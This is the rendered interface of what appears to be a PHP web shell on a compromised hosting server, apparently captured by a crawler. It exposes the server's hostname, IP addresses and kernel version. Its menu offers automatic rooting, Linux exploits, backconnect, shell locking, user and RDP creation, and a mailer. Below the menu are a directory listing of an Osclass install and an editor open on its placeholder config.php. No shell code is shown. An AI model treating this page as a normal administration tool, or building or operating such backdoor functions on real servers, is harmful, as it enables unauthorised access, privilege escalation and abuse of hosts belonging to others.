Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
osclass /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
Bcrypt.php
2.82
KB
-rw-r--r--
changelog.txt
1.42
KB
-rw-r--r--
clone.php
5.86
KB
-rw-r--r--
config.php
509
B
-rw-r--r--
edit.php
5.18
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
11.84
KB
-rw-r--r--
fileindex.php
150
B
-rw-r--r--
import.php
3.45
KB
-rw-r--r--
info.xml
1.65
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
5.74
KB
-rw-r--r--
install.xml
918
B
-rw-r--r--
md5
4.33
KB
-rw-r--r--
notes.txt
174
B
-rw-r--r--
robots.txt
34
B
-rw-r--r--
update_pass.php
595
B
-rw-r--r--
upgrade.php
4.31
KB
-rw-r--r--
upgrade.xml
328
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** * The base MySQL settings of Osclass */ define('MULTISITE', 0); /** MySQL database name for Osclass */ define('DB_NAME', '[[softdb]]'); /** MySQL database username */ define('DB_USER', '[[softdbuser]]'); /** MySQL database password */ define('DB_PASSWORD', '[[softdbpass]]'); /** MySQL hostname */ define('DB_HOST', '[[softdbhost]]'); /** Database Table prefix */ define('DB_TABLE_PREFIX', '[[dbprefix]]'); define('REL_WEB_URL', '[[relativeurl]]/'); define('WEB_PATH', '[[softurl]]/'); ?>
Close